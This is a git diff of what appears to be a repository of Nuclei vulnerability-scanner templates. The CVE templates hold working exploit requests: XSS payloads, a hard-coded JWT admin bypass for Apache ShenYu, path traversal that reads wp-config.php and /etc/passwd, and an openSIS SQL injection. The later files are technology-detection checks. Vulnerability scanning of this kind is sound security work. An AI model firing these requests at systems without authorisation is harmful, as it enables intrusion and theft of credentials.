ManageEngine ADSelfService Plus - Reflected XSS + author: edoardottt + severity: medium + description: Zoho ManageEngine ADSelfService Plus version 6103 and prior is vulnerable to reflected XSS on the loadframe page. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-37416 + cwe-id: CWE-79 + metadata: + shodan-query: http.title:"ManageEngine" + verified: true + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-37416 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37416 + - https://blog.stmcyber.com/vulns/cve-2021-37416/ + tags: cve,cve2021,zoho,xss +requests: + - method: GET + path: + - "{{BaseURL}}/LoadFrame?frame_name=x&src=x&single_signout=x%27%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + part: header + words: + - "text/html" + - type: word + part: body + words: + - ">" + - "adsf/js/" + condition: and diff --git a/poc/cve/cve-2021-37580-6292.yaml b/poc/cve/cve-2021-37580-6292.yaml new file mode 100644 index 0000000000..326f01e24f --- /dev/null +++ b/poc/cve/cve-2021-37580-6292.yaml @@ -0,0 +1,36 @@ +id: CVE-2021-37580 +info: + name: Apache ShenYu Admin JWT - Authentication Bypass + author: pdteam + severity: critical + description: Apache ShenYu 2.3.0 and 2.4.0 allow Admin access without proper authentication. The incorrect use of JWT in ShenyuAdminBootstrap allows an attacker to bypass authentication. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-37580 + - https://github.com/fengwenhua/CVE-2021-37580 + - https://lists.apache.org/thread/o15j25qwtpcw62k48xw1tnv48skh3zgb + - http://www.openwall.com/lists/oss-security/2021/11/16/1 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-37580 + cwe-id: CWE-287 + tags: cve,cve2021,apache,jwt,shenyu +requests: + - raw: + - | + GET /dashboardUser HTTP/1.1 + Host: {{Hostname}} + X-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyTmFtZSI6ImFkbWluIiwiZXhwIjoxNjM3MjY1MTIxfQ.-jjw2bGyQxna5Soe4fLVLaD3gUT5ALTcsvutPQoE2qk + matchers-condition: and + matchers: + - type: word + words: + - 'query success' + - '"userName":"admin"' + - '"code":200' + condition: and + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/02 diff --git a/poc/cve/cve-2021-38702-6314.yaml b/poc/cve/cve-2021-38702-6314.yaml new file mode 100644 index 0000000000..cf51a9d3b3 --- /dev/null +++ b/poc/cve/cve-2021-38702-6314.yaml @@ -0,0 +1,34 @@ +id: CVE-2021-38702 + +info: + name: Cyberoam NetGenie XSS + author: geeknik + severity: medium + description: Cyberoam NetGenie C0101B1-20141120-NG11VO devices through 2021-08-14 allow for reflected Cross Site Scripting via the 'u' parameter of ft.php. + reference: https://seclists.org/fulldisclosure/2021/Aug/20 + tags: cve,cve2021,cyberoam,netgenie,xss,router + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-38702 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - "{{BaseURL}}/tweb/ft.php?u=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + + - type: word + words: + - "text/html" + part: header + + - type: status + status: + - 200 diff --git a/poc/cve/cve-2021-38704-6317.yaml b/poc/cve/cve-2021-38704-6317.yaml deleted file mode 100644 index f6123c5175..0000000000 --- a/poc/cve/cve-2021-38704-6317.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2021-38704 -info: - name: ClinicCases 7.3.3 Reflected Cross-Site Scripting - author: alph4byt3 - severity: medium - description: ClinicCases 7.3.3 is susceptible to multiple reflected cross-site scripting vulnerabilities that could allow unauthenticated attackers to introduce arbitrary JavaScript by crafting a malicious URL. This can result in account takeover via session token theft. - reference: - - https://github.com/sudonoodle/CVE-2021-38704 - - https://nvd.nist.gov/vuln/detail/CVE-2021-38704 - - https://github.com/judsonmitchell/ClinicCases/releases - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-38704 - cwe-id: CWE-79 - metadata: - shodan-query: http.title:"ClinicCases",html:"/cliniccases/" - tags: xss,cve,cve2021,cliniccases -requests: - - method: GET - path: - - '{{BaseURL}}/cliniccases/lib/php/data/messages_load.php?type=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and - matchers: - - type: word - part: body - words: - - "" - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/28 diff --git a/poc/cve/cve-2021-38751-6320.yaml b/poc/cve/cve-2021-38751-6320.yaml new file mode 100644 index 0000000000..e44088c6a4 --- /dev/null +++ b/poc/cve/cve-2021-38751-6320.yaml @@ -0,0 +1,36 @@ +id: CVE-2021-38751 +info: + name: ExponentCMS <= 2.6 Host Header Injection + author: dwisiswant0 + severity: medium + description: An HTTP Host header attack exists in ExponentCMS 2.6 and below in /exponent_constants.php. A modified HTTP header can change links on the webpage to an arbitrary value,leading to a possible attack vector for MITM. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-38751 + - https://github.com/exponentcms/exponent-cms/issues/1544 + - https://github.com/exponentcms/exponent-cms/blob/a9fa9358c5e8dc2ce7ad61d7d5bea38505b8515c/exponent_constants.php#L56-L64 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2021-38751 + cwe-id: CWE-116 + tags: cve,cve2021,exponentcms +requests: + - method: GET + path: + - "{{BaseURL}}" + headers: + Host: "{{randstr}}.tld" + matchers-condition: and + matchers: + - type: word + words: + - '{{randstr}}.tld' + - 'EXPONENT.PATH' + - 'EXPONENT.URL' + part: body + condition: and + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/23 diff --git a/poc/cve/cve-2021-39211(1).yaml b/poc/cve/cve-2021-39211(1).yaml new file mode 100644 index 0000000000..0847c7cf42 --- /dev/null +++ b/poc/cve/cve-2021-39211(1).yaml @@ -0,0 +1,31 @@ +id: CVE-2021-39211 +info: + name: GLPI Telemetry Disclosure + author: dogasantos,noraj + severity: medium + description: GLPI => 9.2 and < 9.5.6, the telemetry endpoint discloses GLPI and server information. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-39211 + - https://github.com/glpi-project/glpi/security/advisories/GHSA-xx66-v3g5-w825 + - https://github.com/glpi-project/glpi/releases/tag/9.5.6 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2021-39211 + cwe-id: CWE-668,CWE-200 + tags: cve,cve2021,glpi,exposure +requests: + - method: GET + path: + - "{{BaseURL}}/ajax/telemetry.php" + - "{{BaseURL}}/glpi/ajax/telemetry.php" + matchers-condition: and + matchers: + - type: word + words: + - '"uuid":' + - '"glpi":' + condition: and + - type: status + status: + - 200 diff --git a/poc/cve/cve-2021-39226-6323.yaml b/poc/cve/cve-2021-39226-6323.yaml new file mode 100644 index 0000000000..1bff9d9534 --- /dev/null +++ b/poc/cve/cve-2021-39226-6323.yaml @@ -0,0 +1,30 @@ +id: CVE-2021-39226 +info: + name: Grafana Snapshot Authentication Bypass + author: Evan Rubinstein + description: Grafana instances up to 7.5.11 and 8.1.5 allow remote unauthenticated users to view the snapshot associated with the lowest database key by accessing the literal paths /api/snapshot/:key or /dashboard/snapshot/:key. If the snapshot is in public mode, unauthenticated users can delete snapshots by accessing the endpoint /api/snapshots-delete/:deleteKey. Authenticated users can also delete snapshots by accessing the endpoints /api/snapshots-delete/:deleteKey, or sending a delete request to /api/snapshot/:key, regardless of whether or not the snapshot is set to public mode (disabled by default). + remediation: "This issue has been resolved in versions 8.1.6 and 7.5.11. If you cannot upgrade you can block access to the literal paths: /api/snapshots/:key, /api/snapshots-delete/:deleteKey, /dashboard/snapshot/:key, and /api/snapshots/:key. They have no normal function and can be disabled without side effects." + reference: + - https://github.com/advisories/GHSA-69j6-29vr-p3j9 + - https://nvd.nist.gov/vuln/detail/CVE-2021-39226 + severity: critical + tags: cve,cve2021,grafana + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-39226 + cwe-id: CWE-200 +requests: + - method: GET + path: + - "{{BaseURL}}/api/snapshots/:key" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - '"isSnapshot":true' + +# Enhanced by cs on 2022/02/22 diff --git a/poc/cve/cve-2021-39312(1).yaml b/poc/cve/cve-2021-39312(1).yaml deleted file mode 100644 index 02e3b11697..0000000000 --- a/poc/cve/cve-2021-39312(1).yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: CVE-2021-39312 -info: - name: WordPress True Ranker <2.2.4 - Local File Inclusion - author: DhiyaneshDK - severity: high - description: WordPress True Ranker before version 2.2.4 allows sensitive configuration files such as wp-config.php, to be accessed via the src parameter found in the ~/admin/vendor/datatables/examples/resources/examples.php file via local file inclusion. - reference: - - https://wpscan.com/vulnerability/d48e723c-e3d1-411e-ab8e-629fe1606c79 - - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39312 - - https://plugins.trac.wordpress.org/browser/seo-local-rank/tags/2.2.2/admin/vendor/datatables/examples/resources/examples.php - - https://nvd.nist.gov/vuln/detail/CVE-2021-39312 - remediation: Fixed in version 2.2.4 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2021-39312 - cwe-id: CWE-22,CWE-22 - tags: cve,cve2021,lfi,wp,wordpress,wp-plugin,unauth,lfr -requests: - - raw: - - | - POST /wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - Cookie: wordpress_test_cookie=WP%20Cookie%20check - - src=%2Fscripts%2Fsimple.php%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php - matchers-condition: and - matchers: - - type: word - part: body - words: - - "DB_NAME" - - "DB_PASSWORD" - condition: and - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/30 diff --git a/poc/cve/cve-2021-41569(1).yaml b/poc/cve/cve-2021-41569(1).yaml deleted file mode 100644 index a65c219ae1..0000000000 --- a/poc/cve/cve-2021-41569(1).yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: CVE-2021-41569 -info: - name: SAS 9.4 build 1520 - Local File Inclusion - author: 0x_Akoko - severity: high - description: SAS/Intrnet 9.4 build 1520 and earlier allows Local File Inclusion. The samples library (included by default) in the appstart.sas file, allows end-users of the application to access the sample.webcsf1.sas program, which contains user-controlled macro variables that are passed to the DS2CSF macro. - reference: - - https://www.mindpointgroup.com/blog/high-risk-vulnerability-discovery-localfileinclusion-sas - - https://nvd.nist.gov/vuln/detail/CVE-2021-41569 - - https://support.sas.com/kb/68/641.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2021-41569 - cwe-id: CWE-829 - tags: cve,cve2021,sas,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/cgi-bin/broker?csftyp=classic,+ssfile1%3d/etc/passwd&_SERVICE=targetservice&_DEBUG=131&_PROGRAM=sample.webcsf1.sas&sysparm=test&_ENTRY=SAMPLIB.WEBSAMP.PRINT_TO_HTML.SOURCE&BG=%23FFFFFF&DATASET=targetdataset&_DEBUG=131&TEMPFILE=Unknown&style=a+tcolor%3dblue&_WEBOUT=test&bgtype=COLOR" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:[x*]:0:0" - - type: status - status: - - 200 diff --git a/poc/cve/cve-2021-41691-6460.yaml b/poc/cve/cve-2021-41691-6460.yaml deleted file mode 100644 index 8b7aa30835..0000000000 --- a/poc/cve/cve-2021-41691-6460.yaml +++ /dev/null @@ -1,45 +0,0 @@ -id: CVE-2021-41691 -info: - name: openSIS Student Information System 8.0 SQL Injection - author: Bartu Utku SARP - severity: high - description: openSIS Student Information System version 8.0 is susceptible to SQL injection via the student_id and TRANSFER[SCHOOL] parameters in POST request sent to /TransferredOutModal.php. - reference: - - https://securityforeveryone.com/blog/opensis-student-information-system-0-day-vulnerability-cve-2021-41691 - - https://www.exploit-db.com/exploits/50637 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4169 - classification: - cve-id: CVE-2021-41691 - tags: cve,cve2021,opensis,sqli,auth -requests: - - raw: - - | - POST /index.php HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - Content-Type: application/x-www-form-urlencoded - - USERNAME={{username}}&PASSWORD={{password}}&language=en&log= - - | - POST /TransferredOutModal.php?modfunc=detail HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - Content-Type: application/x-www-form-urlencoded - - student_id=updatexml(0x23,concat(1,md5(1234)),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5 - attack: pitchfork - payloads: - username: - - student - password: - - student@123 - req-condition: true - cookie-reuse: true - matchers: - - type: dsl - dsl: - - 'contains(body_2, " + - + condition: or + +# digest: 4a0a00473045022100aa670ea1eb9e839c6b4137d2b9c18582caf4785c1330d4cd45ea719821a3cb2d0220048dc0c167ede9836ccc1f5825e83f7316c440865ab72b6abbe86d5ba8e5189c:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/prestashop-detect.yaml b/poc/detect/prestashop-detect.yaml deleted file mode 100644 index d18e4f89a4..0000000000 --- a/poc/detect/prestashop-detect.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: prestashop-detect -info: - name: PrestaShop Tech Detection - author: pdteam - severity: info - tags: tech,cms,prestashop - metadata: - shodan-query: http.component:"PrestaShop" -requests: - - method: GET - path: - - "{{BaseURL}}" - redirects: true - max-redirects: 2 - matchers: - - type: regex - part: body - regex: - - Powered by ]+>PrestaShop - - - - - condition: or diff --git a/poc/detect/prometheus-exporter-detect-9674.yaml b/poc/detect/prometheus-exporter-detect-9674.yaml index e0f4bf47fe..c581c3448c 100644 --- a/poc/detect/prometheus-exporter-detect-9674.yaml +++ b/poc/detect/prometheus-exporter-detect-9674.yaml @@ -10,6 +10,8 @@ requests: - method: GET path: - "{{BaseURL}}" + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 matchers-condition: and matchers: - type: word diff --git a/poc/detect/prtg-detect-9704.yaml b/poc/detect/prtg-detect-9704.yaml index 71481fbbad..e24606ba47 100644 --- a/poc/detect/prtg-detect-9704.yaml +++ b/poc/detect/prtg-detect-9704.yaml @@ -1,43 +1,31 @@ id: prtg-detect - info: name: Detect PRTG author: geeknik - severity: info description: Monitor all the systems, devices, traffic, and applications in your IT infrastructure -- https://www.paessler.com/prtg - metadata: - max-request: 3 - tags: tech,prtg - -http: + severity: info +requests: - method: GET path: - "{{BaseURL}}/index.htm" - "{{BaseURL}}/prtg/index.htm" - "{{BaseURL}}/PRTG/index.htm" - - stop-at-first-match: true - matchers-condition: and matchers: - type: status status: - 200 - - type: word part: body words: - "PRTG Network Monitor" - + condition: and - type: regex part: header regex: - PRTG - extractors: - type: kval part: header kval: - Server - -# digest: 4a0a004730450221009cab3b6f15068a672767bc866ed486c76b5d33eb73c2d94fbcac5306529de6d3022044ea03a8764b767960c65b3be0bd060b7f7e09e5cd4b649170747cb8ffe968e8:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/prtg-detect-9706.yaml b/poc/detect/prtg-detect-9706.yaml deleted file mode 100644 index a5aad5cd3e..0000000000 --- a/poc/detect/prtg-detect-9706.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: prtg-detect -info: - name: Detect PRTG - author: geeknik - description: Monitor all the systems, devices, traffic, and applications in your IT infrastructure -- https://www.paessler.com/prtg - severity: info - tags: tech,prtg -requests: - - method: GET - path: - - "{{BaseURL}}/index.htm" - - "{{BaseURL}}/prtg/index.htm" - - "{{BaseURL}}/PRTG/index.htm" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - part: body - words: - - "PRTG Network Monitor" - condition: and - - type: regex - part: header - regex: - - PRTG - extractors: - - type: kval - part: header - kval: - - Server diff --git a/poc/detect/puppet-node-manager-detect-9720.yaml b/poc/detect/puppet-node-manager-detect-9720.yaml deleted file mode 100644 index a193423212..0000000000 --- a/poc/detect/puppet-node-manager-detect-9720.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: puppet-node-manager-detect - -info: - name: Puppet Node Manager - author: pussycat0x - severity: info - metadata: - max-request: 1 - fofa-query: 'app="puppet-Node-Manager"' - tags: node,tech - -http: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: word - words: - - 'Puppet Node Manager' - - - type: status - status: - - 200 - -# digest: 4b0a00483046022100c10bf89d4461579a558485f770b2d098f424f8fa717f89d0c1f2c40a24fef518022100d805d1324e6441eb8eed1dae4e4d4bc1fdbc4a5ceb9948a16965a707e3e33a99:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/puppet-node-manager-detect.yaml b/poc/detect/puppet-node-manager-detect.yaml new file mode 100644 index 0000000000..a7dea10e27 --- /dev/null +++ b/poc/detect/puppet-node-manager-detect.yaml @@ -0,0 +1,20 @@ +id: puppet-node-manager-detect +info: + name: Puppet Node Manager + author: pussycat0x + severity: info + metadata: + fofa-dork: 'app="puppet-Node-Manager"' + tags: node,tech +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers-condition: and + matchers: + - type: word + words: + - 'Puppet Node Manager' + - type: status + status: + - 200 diff --git a/poc/detect/puppetdb-detect-9717.yaml b/poc/detect/puppetdb-detect-9717.yaml index 31b735ac37..6373cddfa6 100644 --- a/poc/detect/puppetdb-detect-9717.yaml +++ b/poc/detect/puppetdb-detect-9717.yaml @@ -4,13 +4,10 @@ info: name: PuppetDB Detection author: c-sh0 severity: info - reference: - - https://puppet.com/docs/puppetdb/7/api/meta/v1/version.html#pdbmetav1version - metadata: - max-request: 1 + reference: https://puppet.com/docs/puppetdb/7/api/meta/v1/version.html#pdbmetav1version tags: puppet,tech,exposure -http: +requests: - method: GET path: - "{{BaseURL}}/pdb/meta/v1/version" @@ -26,15 +23,13 @@ http: words: - 'application/json' - - type: regex + - type: word part: body - regex: - - '"version"\s:\s"([0-9.]+)"' + words: + - '"version"' extractors: - type: regex group: 1 regex: - '"version"\s:\s"([0-9.]+)"' - -# digest: 490a0046304402201d7a8a0bad8c33ec30ff05992c6a17d9ec0d4fcb5b7c3d7dfac23f906c15247602203edcec555882edc5b02d3265bb8c6a79b3edd20c50a6158ced83029c4712bda1:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/puppetdb-detect-9718.yaml b/poc/detect/puppetdb-detect-9718.yaml index 73c4e2f59c..7b29c8def5 100644 --- a/poc/detect/puppetdb-detect-9718.yaml +++ b/poc/detect/puppetdb-detect-9718.yaml @@ -1,16 +1,15 @@ id: puppetdb-detect info: - name: PuppetDB detection + name: PuppetDB Detection author: c-sh0 - reference: - - https://puppet.com/docs/puppetdb/7/api/meta/v1/version.html#pdbmetav1version severity: info - description: PuppetDB detection + reference: https://puppet.com/docs/puppetdb/7/api/meta/v1/version.html#pdbmetav1version tags: puppet,tech,exposure requests: - method: GET path: - "{{BaseURL}}/pdb/meta/v1/version" + matchers-condition: and matchers: - type: status status: @@ -19,6 +18,10 @@ requests: part: header words: - 'application/json' + - type: word + part: body + words: + - '"version"' extractors: - type: regex group: 1 diff --git a/poc/detect/puppetserver-detect-9721.yaml b/poc/detect/puppetserver-detect-9721.yaml index 08ee862fbb..a880089540 100644 --- a/poc/detect/puppetserver-detect-9721.yaml +++ b/poc/detect/puppetserver-detect-9721.yaml @@ -1,35 +1,31 @@ id: puppetserver-detect - info: name: Puppetserver Detection author: c-sh0 + reference: + - https://insinuator.net/2020/09/puppet-assessment-techniques/ severity: info - reference: https://insinuator.net/2020/09/puppet-assessment-techniques/ + description: Puppetserver Detection tags: tech,puppet,exposure - requests: - method: GET path: - "{{BaseURL}}/puppet-ca/v1/certificate_request/{{randstr}}" - matchers-condition: and matchers: - type: status status: - 404 - - type: word part: header words: - "x-puppet-version" case-insensitive: true - - type: word part: body words: - "{{randstr}}" - extractors: - type: kval kval: - - x_puppet_version \ No newline at end of file + - x_puppet_version diff --git a/poc/detect/puppetserver-detect-9722.yaml b/poc/detect/puppetserver-detect-9722.yaml deleted file mode 100644 index 83c9bcabdf..0000000000 --- a/poc/detect/puppetserver-detect-9722.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: puppetserver-detect - -info: - name: Puppetserver Detection - author: c-sh0 - severity: info - reference: - - https://insinuator.net/2020/09/puppet-assessment-techniques/ - metadata: - max-request: 1 - tags: tech,puppet,exposure,intrusive - -http: - - method: GET - path: - - "{{BaseURL}}/puppet-ca/v1/certificate_request/{{randstr}}" - - matchers-condition: and - matchers: - - type: status - status: - - 404 - - - type: word - part: header - words: - - "x-puppet-version" - case-insensitive: true - - - type: word - part: body - words: - - "{{randstr}}" - - extractors: - - type: kval - kval: - - x_puppet_version - -# digest: 4b0a004830460221009da8fdf7d343803bb76c86b36935e485784f03258b9285ef838fe1bddacf115e02210080939b191b4e6ebd534a1d86ad859bd1cf566f2493f8bf5aa4c26768786edf80:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/redmine-cli-detect-9854.yaml b/poc/detect/redmine-cli-detect-9854.yaml new file mode 100644 index 0000000000..da33d15d29 --- /dev/null +++ b/poc/detect/redmine-cli-detect-9854.yaml @@ -0,0 +1,23 @@ +id: redmine-cli-detect +info: + name: Detect Redmine CLI Configuration File + author: geeknik + severity: info + description: A small command-line utility to interact with Redmine - https://pypi.org/project/Redmine-CLI/ + tags: tech,redmine +requests: + - method: GET + path: + - "{{BaseURL}}/.redmine-cli" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "default" + - "my_id" + - "root_url" + condition: and + - type: status + status: + - 200 diff --git a/poc/detect/remkon-manager-detect.yaml b/poc/detect/remkon-manager-detect.yaml index 0f44dc49fe..3d74086597 100644 --- a/poc/detect/remkon-manager-detect.yaml +++ b/poc/detect/remkon-manager-detect.yaml @@ -1,18 +1,22 @@ id: remkon-manager-detect + info: name: Remkon Device Manager Detect author: pikpikcu severity: info tags: remkon,tech,panel + requests: - method: GET path: - '{{BaseURL}}/login.php' + matchers-condition: and matchers: - type: status status: - 200 + - type: word part: body words: diff --git a/poc/detect/rhymix-cms-detect-9877.yaml b/poc/detect/rhymix-cms-detect-9877.yaml index c62f8f086a..770132eacb 100644 --- a/poc/detect/rhymix-cms-detect-9877.yaml +++ b/poc/detect/rhymix-cms-detect-9877.yaml @@ -1,22 +1,31 @@ id: rhymix-cms-detect + info: name: Rhymix CMS Detect author: gy741 severity: info description: Detects Rhymix CMS + reference: + - https://github.com/rhymix/rhymix + metadata: + max-request: 1 tags: tech,rhymix - reference: https://github.com/rhymix/rhymix -requests: + +http: - method: GET path: - "{{BaseURL}}" + matchers-condition: or matchers: - type: word part: header words: - 'rx_sesskey1' + - type: word part: body words: - '' + +# digest: 490a0046304402207ac43247eda3384fc8a8331614a20db3e489480b9fe2278895b5e60f4ecb9ba902207f8d4071cb25a417b80033d3e4d1ef48971621c76578fc1c3469b561093aa8c8:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/rhymix-cms-detect-9878.yaml b/poc/detect/rhymix-cms-detect-9878.yaml new file mode 100644 index 0000000000..c62f8f086a --- /dev/null +++ b/poc/detect/rhymix-cms-detect-9878.yaml @@ -0,0 +1,22 @@ +id: rhymix-cms-detect +info: + name: Rhymix CMS Detect + author: gy741 + severity: info + description: Detects Rhymix CMS + tags: tech,rhymix + reference: https://github.com/rhymix/rhymix +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers-condition: or + matchers: + - type: word + part: header + words: + - 'rx_sesskey1' + - type: word + part: body + words: + - '' diff --git a/poc/detect/rseenet-detect-9916.yaml b/poc/detect/rseenet-detect-9916.yaml deleted file mode 100644 index 4a788c516d..0000000000 --- a/poc/detect/rseenet-detect-9916.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: rseenet-detect - -info: - name: Advantech R-SeeNet Detection - author: pdteam - severity: info - reference: - - https://icr.advantech.cz/products/software/r-seenet - metadata: - max-request: 1 - shodan-query: http.title:"R-SeeNet" - tags: tech,rseenet - -http: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: regex - part: body - regex: - - 'R-SeeNet (.*)' - - extractors: - - type: regex - group: 1 - regex: - - 'R-SeeNet (.*)' - -# digest: 4a0a00473045022046b9f1935cc337f010d6a348323d13f3848bf5ef9dfc81a1ebf3a37a77f6ace5022100d44a0bce5f1020e203f233e9822ed6c6107ae109b96326e91832fc6d358000e6:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/rseenet-detect.yaml b/poc/detect/rseenet-detect.yaml new file mode 100644 index 0000000000..a18280dc21 --- /dev/null +++ b/poc/detect/rseenet-detect.yaml @@ -0,0 +1,23 @@ +id: rseenet-detect +info: + name: Advantech R-SeeNet Detection + author: pdteam + severity: info + reference: https://icr.advantech.cz/products/software/r-seenet + metadata: + shodan-query: http.title:"R-SeeNet" + tags: tech,rseenet +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers: + - type: regex + part: body + regex: + - 'R-SeeNet (.*)' + extractors: + - type: regex + group: 1 + regex: + - 'R-SeeNet (.*)' diff --git a/poc/detect/rstudio-detect-9917.yaml b/poc/detect/rstudio-detect-9917.yaml deleted file mode 100644 index 9d2d071c9c..0000000000 --- a/poc/detect/rstudio-detect-9917.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: rstudio-detect -info: - name: RStudio panel detector - author: philippedelteil - severity: info - tags: panel,rstudio -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers-condition: and - matchers: - - type: word - words: - - 'RStudio' - part: header - - type: status - status: - - 302 diff --git a/poc/detect/rstudio-detect-9919.yaml b/poc/detect/rstudio-detect-9919.yaml new file mode 100644 index 0000000000..d5e3bef4f2 --- /dev/null +++ b/poc/detect/rstudio-detect-9919.yaml @@ -0,0 +1,21 @@ +id: rstudio-detect + +info: + name: RStudio panel detector + author: philippedelteil + severity: info + tags: panel,rstudio + +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers-condition: and + matchers: + - type: word + words: + - 'RStudio' + part: header + - type: status + status: + - 302 diff --git a/poc/detect/rstudio-detect.yaml b/poc/detect/rstudio-detect.yaml index d5e3bef4f2..9d2d071c9c 100644 --- a/poc/detect/rstudio-detect.yaml +++ b/poc/detect/rstudio-detect.yaml @@ -1,11 +1,9 @@ id: rstudio-detect - info: name: RStudio panel detector author: philippedelteil severity: info tags: panel,rstudio - requests: - method: GET path: diff --git a/poc/detect/s3-detect-9964.yaml b/poc/detect/s3-detect-9964.yaml index 7868591be0..a7fdcd87d1 100644 --- a/poc/detect/s3-detect-9964.yaml +++ b/poc/detect/s3-detect-9964.yaml @@ -1,14 +1,29 @@ id: s3-detect + info: name: Detect Amazon-S3 Bucket author: melbadry9 severity: info -requests: + metadata: + max-request: 1 + tags: aws,s3,bucket,tech + +http: - method: GET path: - "{{BaseURL}}/%c0" + + matchers-condition: or matchers: - type: regex + part: body regex: - "(?:InvalidURI|InvalidArgument|NoSuchBucket)" - part: body + + - type: dsl + dsl: + - 'contains(to_lower(server), "amazons3")' + - 'contains(to_lower(header), "x-amz-id")' + - 'contains(to_lower(header), "x-amz-request-id")' + +# digest: 4b0a00483046022100e4d62de5d67e017609c9e06ca9dcc8a840a222db5d65cb83201b7d13bb84dfa4022100efc723578b13403d1c4216dfc6add252cd5c7423d8e64045293962a21497a063:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/samba-detect-9988.yaml b/poc/detect/samba-detect-9988.yaml index 1bd21fd9d7..68f0879828 100644 --- a/poc/detect/samba-detect-9988.yaml +++ b/poc/detect/samba-detect-9988.yaml @@ -1,16 +1,18 @@ id: samba-detection info: name: Samba Detection + description: Samba is a free and open-source software that allows files to be shared across Windows and Linux systems simply and easily. + remediation: Always apply the latest security patch. author: pussycat0x severity: info - description: Samba is a free and open-source software that allows files to be shared across Windows and Linux systems simply and easily. + tags: network,smb,samba reference: - https://www.samba.org/samba/what_is_samba.html - https://www.samba.org/samba/history/security.html classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 cwe-id: CWE-200 - remediation: Always apply the latest security patch. - tags: network,smb,samba network: - inputs: - data: 000000a4ff534d4272000000000801400000000000000000000000000000400600000100008100025043204e4554574f524b2050524f4752414d20312e3000024d4943524f534f4654204e4554574f524b5320312e303300024d4943524f534f4654204e4554574f524b5320332e3000024c414e4d414e312e3000024c4d312e3258303032000253616d626100024e54204c414e4d414e20312e3000024e54204c4d20302e313200 diff --git a/poc/detect/samsung-printer-detect.yaml b/poc/detect/samsung-printer-detect.yaml index e203a00e6e..883f060872 100644 --- a/poc/detect/samsung-printer-detect.yaml +++ 